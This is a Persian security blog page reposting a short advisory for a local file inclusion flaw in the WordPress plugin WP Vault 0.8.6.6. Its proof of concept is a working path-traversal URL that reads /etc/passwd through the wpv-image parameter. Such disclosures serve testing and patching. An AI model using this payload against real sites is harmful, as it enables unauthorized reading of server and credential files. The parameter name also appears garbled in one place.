قالب وردپرس پوسته وردپرس قالب فروشگاهی وردپس

WordPress WP Vault 0.8.6.6 Local File Inclusion

# Exploit Title: WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04

1 – Description:

$_GET[awpv-imagea] is not escaped in include file.

WP Vault 0.8.6.6 – Local File Inclusion

2 – Proof of Concept:

http://Target/?wpv-image=[LFI]

http://Target/?wpv-image=../../../../../../../../../../etc/passwd

3 – Timeline:

12/11/2016 – Discovered
12/11/2016 – vendor not found

درباره نویسنده

علی سعیدی هستم مدیر گروه سکوریتی لرنینگ فعالیت در زمینه پایتون - گنو لینوکس و هک و امنیت

مطالب مرتبط

نظر بدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *